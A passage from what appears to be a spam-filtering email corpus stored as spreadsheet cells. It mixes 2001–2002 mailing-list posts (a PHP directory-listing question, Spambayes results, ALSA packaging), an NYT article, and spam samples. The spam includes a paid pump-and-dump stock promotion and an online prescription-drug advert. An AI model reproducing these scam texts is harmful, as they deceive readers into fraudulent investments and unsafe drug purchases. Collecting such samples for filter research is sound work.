 &lt;P ALIGN=3D"CENTER"&gt;&lt;FONT COLOR=3D"#FF0000" face=3D"Arial"&gt;&lt;B&gt;&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;A HREF=3D"http://euro.specialdiscounts4u.com/"&gt;&lt;FONT face=3D"A=
 rial"&gt;&lt;B&gt;Click Here Now!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Quick php advice needed :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --Multipart_Thu__1_Aug_2002_10:51:56_+0200_0865e508
 Content-Type: text/plain; charset=US-ASCII
 Content-Transfer-Encoding: 7bit
 Sorry, this hasn't got much to do with rpm packages directly ;-)
 My "builds" page is getting bigger and bigger, and quite messy as
 directories are listed in no particular order :
 http://freshrpms.net/builds/
 What I'd need is to have last modification date of the directory displayed
 next to the directory name (sort of like "mplayer - Thu Aug 1 2002"), and
 the list ordered to have the most recent entries at the top.
 Now, if there are php programmers on this list, I'd love to have their help
 on how to do this ;-) It must be quite simple to get the system mtime for
 the directory, it's the ordering that scares me a bit more.
 Attached is the current code (please keep in mind that I'm not a
 programmer, it usually explains a lot ;-)).
 Matthias
 -- 
 Matthias Saou                                World Trade Center
 -------------                                Edificio Norte 4 Planta
 System and Network Engineer                  08039 Barcelona, Spain
 Electronic Group Interactive                 Phone : +34 936 00 23 23
 --Multipart_Thu__1_Aug_2002_10:51:56_+0200_0865e508
 Content-Type: text/html;
  name="index.html"
 Content-Disposition: attachment;
  filename="index.html"
 Content-Transfer-Encoding: 7bit
 &lt;?
 include("main.inc");
 global $redhat_conn;
 page_header ("Fresh meat for fresh rpms");
 page_start ("");
 ?&gt;
 &lt;p&gt;
 These are the current versions of all spec files and patches used for the builds you may find here. An anonymous CVS repository may be available some day so that all older releases become available too... "maybe", that is...
 &lt;?
 if (!$build) {
 	$open_dir = opendir(".");
 	echo "&lt;p&gt;Builds which have files publicly available :\n\n&lt;p&gt;\n";
 	while ( $file = readdir( $open_dir ) ) {
 		if ( ( is_dir( $file ) ) and ( !eregi("^\.|CVS$", $file) ) ) {
 			echo "&lt;img src=\"/img/bluearrow.png\" width=\"5\" height=\"9\" alt=\"dot\"&gt; &lt;a href=\"$PHP_SELF?build=$file\"&gt;$file&lt;/a&gt;&lt;br&gt;\n";
 		}
 	}
 } else {
 	if ( is_dir( $build ) ) {
 		$open_dir = opendir( $build );
 		echo "&lt;p&gt;Files available for build \"$build\" :\n\n&lt;p&gt;\n";
 		while ( $file = readdir( $open_dir ) ) {
 			if ( !is_dir( $file ) ) {
 				echo "&lt;img src=\"/img/bluearrow.png\" width=\"5\" height=\"9\" alt=\"dot\"&gt; &lt;a href=\"$build/$file\"&gt;$file&lt;/a&gt;&lt;br&gt;\n";
 			}
 		}
 	} else {
 		echo "&lt;p&gt;\nEeeek! I can't find that build.\n&lt;/p&gt;\n\n";
 	}
 	echo "&lt;p&gt;&lt;a href=\"$PHP_SELF\"&gt;Back to the list of builds&lt;/a&gt;\n\n";
 }
 ?&gt;
 &lt;? page_stop ('$Id: index.html,v 1.2 2002/05/11 13:15:54 dude Exp $') ?&gt;
 --Multipart_Thu__1_Aug_2002_10:51:56_+0200_0865e508--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] XTreme Training
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; ...
 &gt; At the other extreme, training on half my ham&amp;spam, and scoring aginst
 &gt; the other half
 &gt; ...
 &gt;     false positive rate: 0.0100%
 &gt;     false negative rate: 0.3636%
 &gt; ...
 &gt; Alas, all 4 of the 0.99 clues there are HTML-related.
 That begged to try it again but with Tokenize/retain_pure_html_tags false.
 The random halves getting trained on and scored against are different here,
 and I repaired the bug that dropped 1 ham and 1 spam on the floor, so this
 isn't exactly a 1-change difference between runs.
 Ham distribution for all runs:
 * = 167 items
   0.00 9999 ************************************************************
  10.00    0
  20.00    0
  30.00    0
  40.00    0
  50.00    0
  60.00    0
  70.00    0
  80.00    0
  90.00    1 *
 Spam distribution for all runs:
 * = 115 items
   0.00   21 *
  10.00    0
  20.00    0
  30.00    1 *
  40.00    0
  50.00    0
  60.00    1 *
  70.00    0
  80.00    1 *
  90.00 6852 ************************************************************
     false positive rate: 0.0100%
     false negative rate: 0.3490%
 Yay!  That may mean that HTML tags aren't really needed in my test data
 provided it's trained on enough stuff.  Curiously, the sole false positive
 here is the same as the sole false positive on the half&amp;half run reported in
 the preceding msg (I assume the Nigerian scam "false positive" just happened
 to end up in the training data both times):
 ************************************************************************
 Data/Ham/Set4/107687.txt
 prob = 0.999632042904
 prob('python.') = 0.01
 prob('alteration') = 0.01
 prob('edinburgh') = 0.01
 prob('subject:Python') = 0.01
 prob('header:Errors-To:1') = 0.0216278
 prob('thanks,') = 0.0319955
 prob('help?') = 0.041806
 prob('road,') = 0.0462364
 prob('there,') = 0.0722794
 prob('us.') = 0.906609
 prob('our') = 0.919118
 prob('company,') = 0.921852
 prob('visit') = 0.930785
 prob('sent.') = 0.939882
 prob('e-mail') = 0.949765
 prob('courses') = 0.954726
 prob('received') = 0.955209
 prob('analyst') = 0.960756
 prob('investment') = 0.975139
 prob('regulated') = 0.99
 prob('e-mails') = 0.99
 prob('mills') = 0.99
 Received: from [195.171.5.71] (helo=node401.dmz.standardlife.com)
         by mail.python.org with esmtp (Exim 3.21 #1)
         id 15rDsu-00085k-00
         for python-list@python.org; Wed, 10 Oct 2001 03:34:32 -0400
 Received: from slukdcn4.internal.standardlife.com (slukdcn4.standardlife.com
         [10.3.2.72])
         by node401.dmz.standardlife.com (Pro-8.9.3/Pro-8.9.3) with SMTP id
         IAA53660for &lt;python-list@python.org&gt;; Wed, 10 Oct 2001 08:34:00
 +0100
 Received: from sl079320 ([172.31.88.231]) by
         slukdcn4.internal.standardlife.com (Lotus SMTP MTA v4.6.6  (890.1
 7-16-1999))
         with SMTP id 80256AE1.00294B60; Wed, 10 Oct 2001 08:31:02 +0100
 Message-ID:
 &lt;007e01c1515d$bb255940$e7581fac@sl079320.internal.standardlife.com&gt;
 From: "Vickie Mills" &lt;vickie_mills@standardlife.com&gt;
 To: &lt;python-list@python.org&gt;
 Subject: Training Courses in Python in UK
 Date: Wed, 10 Oct 2001 08:32:30 +0100
 MIME-Version: 1.0
 Content-Type: text/plain;
         charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 X-Priority: 3
 X-MSMail-Priority: Normal
 X-Mailer: Microsoft Outlook Express 4.72.3155.0
 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
 Sender: python-list-admin@python.org
 Errors-To: python-list-admin@python.org
 X-BeenThere: python-list@python.org
 X-Mailman-Version: 2.0.6 (101270)
 Precedence: bulk
 List-Help: &lt;mailto:python-list-request@python.org?subject=help&gt;
 List-Post: &lt;mailto:python-list@python.org&gt;
 List-Subscribe: &lt;http://mail.python.org/mailman/listinfo/python-list&gt;,
         &lt;mailto:python-list-request@python.org?subject=subscribe&gt;
 List-Id: General discussion list for the Python programming language
         &lt;python-list.python.org&gt;
 List-Unsubscribe: &lt;http://mail.python.org/mailman/listinfo/python-list&gt;,
         &lt;mailto:python-list-request@python.org?subject=unsubscribe&gt;
 List-Archive: &lt;http://mail.python.org/pipermail/python-list/&gt;
 Hi there,
 I am looking for you recommendations on training courses available in the UK
 on Python.  Can you help?
 Thanks,
 Vickie Mills
 IS Training Analyst
 Tel:    0131 245 1127
 Fax:    0131 245 1550
 E-mail:    vickie_mills@standardlife.com
 For more information on Standard Life, visit our website
 http://www.standardlife.com/   The Standard Life Assurance Company, Standard
 Life House, 30 Lothian Road, Edinburgh EH1 2DH, is registered in Scotland
 (No SZ4) and regulated by the Personal Investment Authority.  Tel: 0131 225
 2552 - calls may be recorded or monitored.  This confidential e-mail is for
 the addressee only.  If received in error, do not retain/copy/disclose it
 without our consent and please return it to us.  We virus scan all e-mails
 but are not responsible for any damage caused by a virus or alteration by a
 third party after it is sent.
 ************************************************************************
 The top 30 discriminators are more interesting now:
         'income' 629 0.99
         'http0:python' 643 0.01
         'header:MiME-Version:1' 672 0.99
         'http1:remove' 693 0.99
         'content-type:text/html' 711 0.982345
         'string' 714 0.01
         'http&gt;1:jpg' 776 0.99
         'object' 813 0.01
         'python,' 852 0.01
         'python.' 882 0.01
         'language' 883 0.01
         '&gt;&gt;&gt;' 907 0.01
         'header:Return-Path:2' 907 0.99
         'unsubscribe' 975 0.99
         'header:Received:7' 1113 0.99
         'def' 1142 0.01
         'http&gt;1:gif' 1168 0.99
         'module' 1169 0.01
         'import' 1332 0.01
         'header:Received:8' 1342 0.99
         'header:Errors-To:1' 1377 0.0216278
         'header:In-Reply-To:1' 1402 0.01
         'wrote' 1753 0.01
         '&amp;nbsp;' 2067 0.99
         'subject:Python' 2140 0.01
         'header:User-Agent:1' 2322 0.01
         'header:X-Complaints-To:1' 4351 0.01
         'wrote:' 4370 0.01
         'python' 4972 0.01
         'header:Organization:1' 6921 0.01
 There are still two HTML clues remaining there ("&amp;nbsp;" and
 "content-type:text/html").  Anthony's trick accounts for almost a third of
 these.  "Python" appears in 5 of them ('http0:python' means that 'python'
 was found in the 1st field of an embedded http:// URL).  Sticking a .gif or
 a .jpg in  a URL both score as 0.99 spam clues.  Note the damning pattern of
 capitalization in 'header:MiME-Version:1'!  This counting is case-sensitive,
 and nobody ever would have guessed that MiME is more damning than SUBJECT or
 DATE.  Why would spam be likely to end up with two instances of Return-Path
 in the headers?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let get together when you get back
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;HEAD&gt;
     &lt;TITLE&gt;
     &lt;/TITLE&gt;
 &lt;META http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Dwindo=
 ws-1252=22&gt;
     &lt;STYLE&gt;
 A:link =7B
     TEXT-DECORATION: none
 =7D
 A:active =7B
     TEXT-DECORATION: none
 =7D
 A:visited =7B
     TEXT-DECORATION: none
 =7D
 A:hover =7B
     COLOR: =230033ff; TEXT-DECORATION: underline
 =7D&lt;/STYLE&gt;
 &lt;META content=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;
 &lt;/HEAD&gt;
    &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgCo=
 lor=3D=22=23ffffff=22&gt;
        &lt;TABLE borderColor=3D=22=233366cc=22 cellSpacing=3D=224=22 cellPadding=3D=
 =2215=22 border=3D=224=22&gt;
            &lt;TR&gt;
                &lt;TD bgColor=3D=22=233366cc=22&gt;
                    &lt;DIV align=3D=22center=22&gt;                      
                       &lt;FONT face=3D=22arial, helvetica=22 color=3D=23ffffff&gt;=
                       &lt;FONT size=3D6&gt;                                 Fo=
 r 
                                        Immediate Release&lt;BR&gt;
                    &lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
            &lt;TR&gt;
                &lt;TD&gt;
 &lt;P&gt;                  
                   &lt;FONT face=3D=22arial, helvetica=22 color=3D=23000000 size=
 =3D3&gt;                  
                   &lt;FONT 
       size=3D2&gt;&lt;STRONG&gt;Cal-Bay (Stock Symbol:&amp;nbsp;CBYI) 
       &lt;/STRONG&gt;Watch for analyst =22Strong Buy Recommendations=22 and sev=
 eral advisory newsletters 
       picking CBYI.&amp;nbsp;&amp;nbsp; CBYI has filed to be traded on the&amp;nbsp=
 ;OTCBB, 
       share prices historically INCREASE when companies get listed 
       on this larger trading&amp;nbsp;exhange. CBYI is trading around 25 ce=
 nts 
       and should skyrocket to =242.66 - =243.25 a share in the near futur=
 e. &amp;nbsp; 
       &lt;STRONG&gt;Put CBYI on your watch list, acquire a postion&lt;/STRONG&gt;&lt;/=
 FONT&gt;                  
                   &lt;FONT size=3D2&gt;&lt;STRONG&gt;TODAY.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/=
 P&gt;                  
                   &lt;FONT 
       face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;              =
                   &lt;FONT size=3D2&gt;
 &lt;P&gt;                             REASONS TO INVEST IN CBYI
                                  &lt;LI&gt;   A profitable company and is on =
 track to beat ALL 
       earnings estimates                                
                                 &lt;FONT size=3D2&gt;    =21&lt;/FONT&gt;
                                  &lt;LI&gt;One of the FASTEST growing distrib=
 utors in environmental &amp;amp; safety 
       equipment instruments.
                                  &lt;LI&gt;&lt;/FONT&gt;                           =
                                 &lt;FONT size=3D2&gt;Excellent management team=
 , several EXCLUSIVE 
       contracts.&amp;nbsp; IMPRESSIVE client list including the&amp;nbsp;U.S. A=
 ir Force, 
       Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=
       GE-Energy &amp;amp; Environmental Research.&lt;/FONT&gt;&lt;/FONT&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;RAPID=
 LY GROWING INDUSTRY&lt;/STRONG&gt;&amp;nbsp;&lt;BR&gt;Industry revenues exceed =24900 mil=
 lion, estimates indicate that there 
       could be as much as =2425 billion from =22smell technology=22 by the=
  end of 
       2003.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;=21=21=21=
 =21=21 CONGRATULATIONS 
       =21=21=21=21=21&lt;BR&gt;&lt;/STRONG&gt;Our last recommendation to buy&amp;nbsp;ORBT a=
 t 
       =241.29&amp;nbsp;rallied&amp;nbsp;and is holding steady at&amp;nbsp;=244.51=21&amp;n=
 bsp; 
       Congratulations to all our subscribers that took advantage of thi=
 s 
       recommendation.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;     =
                                 &lt;FONT 
       color=3D=230000ff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;
 &lt;P align=3D=22center=22&gt;&lt;STRONG&gt;                                
                                 &lt;FONT color=3D=23ff0000&gt;ALL removes HONER=
 ED. Please allow 7 
       days to be removed and send ALL address to:&lt;A href=3D=22mailto:UnSu=
 bscribe=40btamail.net.cn=22&gt;
 NeverAgain=40btamail.net.cn
 &lt;/A&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/A&gt;&lt;/A&gt;&lt;/A&gt;&lt;/P&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/LI&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
        &lt;/TABLE&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;Certain statements contained in this news release m=
 ay be 
 forward-looking statements within the meaning of The Private Securities=
 Litigation Reform Act of 1995. These statements may be identified by su=
 ch terms 
 as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila=
 r terms. We are NOT 
 a registered investment advisor or a broker dealer. This is NOT an offe=
 r to buy 
 or sell securities. No recommendation that the securities of the compan=
 ies 
 profiled should be purchased, sold or held by individuals or entities t=
 hat learn 
 of the profiled companies. We were paid =2427,000 in cash by a third par=
 ty to 
 publish this report. Investing in companies profiled is high-risk and u=
 se of 
 this information is for reading purposes only. If anyone decides to act=
  as an 
 investor, then it will be that investor's sole risk. Investors are advi=
 sed NOT 
 to invest without the proper advisement from an attorney or a registere=
 d 
 financial broker. Do not rely solely on the information presented, do a=
 dditional 
 independent research to form your own opinion and decision regarding in=
 vesting 
 in the profiled companies. Be advised that the purchase of such high-ri=
 sk 
 securities may result in the loss of your entire investment.&lt;/FONT&gt;    =
       &lt;FONT 
 size=3D1&gt;The owners of this publication may already own free trading sha=
 res in 
 CBYI and may immediately sell all or a portion of these shares into the=
  open 
 market at or about the time this report is published.&amp;nbsp; Factual sta=
 tements 
 are made as of the date stated and are subject to change without notice=
 .&amp;nbsp; 
 Not intended for recipients or residents of CA,CO,CT,DE,ID,      
       &lt;FONT 
 size=3D1&gt;IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where 
 prohibited.&amp;nbsp;&lt;/FONT&gt;      
       &lt;FONT size=3D1&gt;Copyright c 2001&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
    &lt;/BODY&gt;
 &lt;/HTML&gt;
 ********
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: Vast Detail on Towers' Collapse May Be Sealed
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by khare@alumni.caltech.edu.
 Another reminder that the moral writ of intellectual property is -- and ought to --be more limited than real property. Private money paid for these bits, but expropriation may be fairer for IP than real-P.
 Rohit
 khare@alumni.caltech.edu
 Vast Detail on Towers' Collapse May Be Sealed
 September 30, 2002
 By JAMES GLANZ and ERIC LIPTON 
 What is almost certainly the most sophisticated and
 complete understanding of exactly how and why the twin
 towers of the World Trade Center fell has been compiled as
 part of a largely secret proceeding in federal court in
 Lower Manhattan. 
 Amassed during the initial stages of a complicated
 insurance lawsuit involving the trade center, the
 confidential material contains data and expert analysis
 developed by some of the nation's most respected
 engineering minds. It includes computer calculations that
 have produced a series of three-dimensional images of the
 crumpled insides of the towers after the planes hit,
 helping to identify the sequence of failures that led to
 the collapses. 
 An immense body of documentary evidence, like maps of the
 debris piles, rare photos and videos, has also been
 accumulated in a collection that far outstrips what
 government analysts have been able to put together as they
 struggle to answer the scientifically complex and
 emotionally charged questions surrounding the deadly
 failures of the buildings. 
 But everyone from structural engineers to relatives of
 victims fear that the closely held information, which
 includes the analysis and the possible answers that
 families and engineers around the world have craved, may
 remain buried in sealed files, or even destroyed. 
 Bound by confidentiality agreements with their clients, the
 experts cannot disclose their findings publicly as they
 wait for the case to play out. Such restrictions are
 typical during the discovery phase of litigation. And as it
 now stands, the judge in the case - who has agreed that
 certain material can remain secret for the time being - has
 approved standard legal arrangements that, should the
 lawsuit be settled before trial, could cause crucial
 material generated by the competing sides to be withheld. 
 "We're obviously in favor of releasing the information, but
 we can't until we're told what to do," said Matthys Levy,
 an engineer and founding partner at Weidlinger Associates,
 who is a consultant in the case and the author of "Why
 Buildings Fall Down: How Structures Fail" (Norton, 2nd
 edition, 2002). 
 "Let's just say we understand the mechanics of the whole
 process" of the collapse, Mr. Levy said. 
 Monica Gabrielle, who lost her husband, Richard, when the
 south tower fell and who is a member of the Skyscraper
 Safety Campaign, said the information should be disclosed.
 "If they have answers and are not going to share them, I
 would be devastated," Mrs. Gabrielle said. "They have a
 moral obligation." 
 The lawsuit that has generated the information involves
 Larry A. Silverstein, whose companies own a lease on the
 trade center property, and a consortium of insurance
 companies. Mr. Silverstein maintains that each jetliner
 that hit the towers constituted a separate terrorist
 attack, entitling him to some $7 billion, rather than half
 that amount, as the insurance companies say. 
 As both sides have prepared their arguments, they have
 spent hundreds of thousands of dollars acquiring expert
 opinion about exactly what happened to the towers. 
 Dean Davison, a spokesman for Industrial Risk Insurers of
 Hartford, one of the insurance companies in the suit, said
 of the findings, "There are some confidentiality agreements
 that are keeping those out of the public domain today." He
 conceded that differing opinions among the more than 20
 insurers on his side of the case could complicate any
 release of the material. 
 As for his own company, whose consultants alone have
 produced more than 1,700 pages of analysis and thousands of
 diagrams and photographs, Mr. Davison said every attempt
 would be made to give the material eventually to "public
 authorities and investigative teams." 
 Still, some of that analysis relies on information like
 blueprints and building records from other sources, like
 the Port Authority of New York and New Jersey, which built
 and owned the trade center and supports Mr. Silverstein in
 the suit. Mr. Davison said he was uncertain how the
 differing origins of the material would influence his
 company's ability to release information. 
 In a statement, the Port Authority said access to documents
 would be "decided on a case-by-case basis consistent with
 applicable law and policy," adding that it would cooperate
 with "federal investigations." 
 The fate of the research is particularly critical to
 resolve unanswered questions about why the towers fell,
 given the dissatisfaction with the first major inquiry into
 the buildings' collapse. That investigation, led by the
 Federal Emergency Management Agency, was plagued by few
 resources, a lack of access to crucial information like
 building plans, and infighting among experts and officials.
 A new federal investigation intended to remedy those
 failings has just begun at the National Institute of
 Standards and Technology, or NIST, an agency that has
 studied many building disasters. 
 Officials with NIST have said it could take years to make
 final determinations and recommendations for other
 buildings, a process they now acknowledge might be speeded
 up with access to the analysis done by the consultants on
 the lawsuit. 
 Gerald McKelvey, a spokesman for Mr. Silverstein, said of
 the real estate executive's own heavily financed
 investigative work, "We decline to comment other than to
 say that Silverstein is cooperating fully with the NIST
 investigation." A spokesman for the agency confirmed it was
 in discussions with Mr. Silverstein on the material, but
 said no transfer had taken place. 
 With no shortage of money or expertise, investigations by
 both sides in the legal case have produced a startling body
 of science and theory, some of it relevant not only to the
 trade center disaster but to other skyscrapers as well. 
 "The work should be available to other investigators," said
 Ramon Gilsanz, a structural engineer and managing partner
 at Gilsanz Murray Steficek, who was a member of the earlier
 inquiry. "It could be used to build better buildings in the
 future." 
 Legal experts say confidentiality arrangements like the one
 governing the material can lead to a variety of outcomes,
 from full or partial disclosure to destruction of such
 information. In some cases, litigants who paid for the
 reports may make them public themselves. Or they may ask to
 have them sealed forever. 
 "It is not unusual for one party or another to try to keep
 some of those documents secret for one reason or another,
 some legitimate, some not," said Lee Levine, a First
 Amendment lawyer at Levine Sullivan &amp; Koch in Washington. 
 Mr. Levine said that because of the presumed value of the
 information, the court might look favorably on requests to
 make it public. But the uncertainty over the fate of the
 material is unnerving to many people, especially experts
 who believe that only a complete review of the evidence -
 not piecemeal disclosures by litigants eager to protect
 their own interests - could lead to an advance in the
 federal investigation of the trade center. 
 "It's important for this to get presented and published and
 subjected to some scrutiny," said Dr. John Osteraas,
 director of civil engineering practice at Exponent Failure
 Analysis in Menlo Park, Calif., and a consultant on the
 case, "because then the general engineering community can
 sort it out." 
 The scope of the investigation behind the scenes is vast by
 any measure. Mr. Levy and his colleagues at Weidlinger
 Associates, hired by Silverstein Properties, have called
 upon powerful computer programs, originally developed with
 the Pentagon for classified research, to create a model of
 the Sept. 11 attack from beginning to end. 
 The result is a compilation of three-dimensional images of
 the severed exterior columns, smashed floor and damaged
 core of the towers, beginning with the impacts and
 proceeding up to the moments of collapse. Those images -
 which Mr. Levy is not allowed to release - have helped
 pinpoint the structural failures. 
 The FEMA investigators did not have access to such computer
 modeling. Nor did the FEMA team have unfettered access to
 the trade center site, with all its evidence, in the weeks
 immediately after the attacks. But no such constraints
 hampered engineers at LZA/Thornton-Tomasetti, brought to
 the site for emergency work beginning on the afternoon of
 Sept. 11. Daniel A. Cuoco, the company president and a
 consultant to Silverstein Properties on the case, said he
 had assembled detailed maps of the blazing debris at ground
 zero in models that perhaps contain further clues about how
 the towers fell. 
 Though the FEMA team could not determine "where things
 actually fell," Mr. Cuoco said, "we've indicated the
 specific locations." 
 Mr. Cuoco said he could not reveal any additional details
 of the findings. Nor would Mr. Osteraas discuss the details
 of computer calculations his company has done on the spread
 of fires in large buildings like the twin towers. Mr.
 Osteraas has also compiled an extensive archive of
 photographs and videos of the towers that day, some of
 which he believes have not been available to other
 investigators. 
 And the investigation has not limited itself to computers
 and documentary evidence. For months, experiments in wind
 tunnels in the United States and Canada have been examining
 the aerodynamics that fed the flames that day and stressed
 the weakening structures. 
 Jack Cermak, president of Cermak Peterka Peterson in Fort
 Collins, Colo., was retained by the insurance companies but
 had previously performed wind-tunnel studies for the
 original design of the twin towers nearly 40 years ago. For
 the legal case, Dr. Cermak said, "we've done probably more
 detailed measurements than in the original design." 
 "The data that have been acquired are very valuable in
 themselves for understanding how wind and buildings
 interact," Dr. Cermak said. "Some of the information may be
 valuable for the litigation," he said, adding, "I think
 I've told you all I can."
 http://www.nytimes.com/2002/09/30/nyregion/30TOWE.html?ex=1034388663&amp;ei=1&amp;en=0d3143a997e5e2e1
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Alsa/Redhat 8 compatability
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@rpmforge.net) wrote*:
 &gt;I really think that with my ALSA packages, ALSA on Red Hat Linux has never
 &gt;been so easy! ;-)
 I had been hand building those alsa packages for probably 6 months or more, so I
 could use my laptop's ESS chip best (hard disk recording and such). Wow, maybe 8 to
 10 months, time flys. I didn't look forward to doing that tedious build every time I
 changed a kernel or something. Matthias has made this a thing of the past! Dude,
 it's a no brainer, use apt-get or just download and install.
 What's more, OSS is fully "imitated", older apps using OSS are as happy as a clam.
 My personal taste tells me newer apps which use alsa sound better (alsaplayer, xmms
 with alsa module) to my ear.
 The 2 things that trick people are the modules.conf file, they didn't have that
 automatic matrix page when I started with alsa, you don't know how good you have it.
 And on my old installs (only the first time I installed it on a clean box), alsa
 always was "muted" until you fire up a mixer and turn up the music. It's possible
 Matthias even took care of that too. Anyway it is/was only a one time thing on 1st
 install, that was a long time ago for me.
 Those ALSA dudes had been trying to get it into the 2.4 kernel but missed it, but
 it's been in 2.5 for a while now, so alsa is the future of sound in the linux kernel.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Internet saturation (but not in Iceland)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt; writes:
     E&gt; Gary's news service at teledyn.com has an article on Internet
     E&gt; Saturation.  Let me ask you....If you were on a rock in the
     E&gt; middle of the Atlantic, mostly in the dark for half the year,
     E&gt; wouldn't *you* like a bit of internet distraction?  They've
     E&gt; already done the obvious and fiber-ringed the island.
 There's lots of similar places.  Saskatchewan, for example, once
 shared with Iceland the distinction of most telephone connections per
 capita, and for a long time shared the internet penetration lead with
 Iceland (Sask is a land-locked massive expanse of ultra-flat dust with
 only two rivers and farm sizes measured in the
 hundred-thousand-hectares).
 It's still curious Iceland leads.  Maybe there's just a deep cultural
 curiousity and fascination with watching advertising from the rest of
 the world. Maybe they're downloading Bjork videos.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Online Doc, can give you a prescription.
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------6778712SOS1
 Content-Type: multipart/alternative;
  boundary="------------712SOS1SOS2"
 --------------712SOS1SOS2
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 AT LAST VIAGRA, XENICAL (And many other Perscription Drugs) ONLINE! 
 No waiting rooms, drug stores, 
 or embarassing conversations. 
 Just fill out the form and our Doctor will 
 have your order to you by tomorrow!
 CLICK HERE 
 Many other prescription drugs available, including:
 XENICAL, weight loss medication used to help overweight people lose weight and keep this weight off. 
 VALTREX, Treatement for Herpes. 
 PROPECIA, the first pill that effectively treats male pattern hair loss. 
 And Many More......
 CLICK HERE : http://www.inspacehosting.net/pharmacy
 --------------------------------------------------------------------------------
 To be removed from future mailings: Click here : http://www.inspacehosting.net/pharmacy/remove.html
 --------------712SOS1SOS2
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;!-- kingofspan --&gt;
 &lt;BODY&gt;
 &lt;B&gt;&lt;FONT face=Arial color=red size=4&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 13.5pt; COLOR: red; FONT-FAMILY: Arial"&gt;AT 
 LAST VIAGRA, XENICAL (And many other Perscription Drugs) ONLINE! 
 &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;b&gt;&lt;font size=4
  color=red face=Arial&gt;&lt;span style="FONT-WEIGHT:
  bold; FONT-SIZE: 13.5pt; COLOR: red; FONT-FAMILY: Arial"&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;No 
 waiting rooms, drug stores, &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
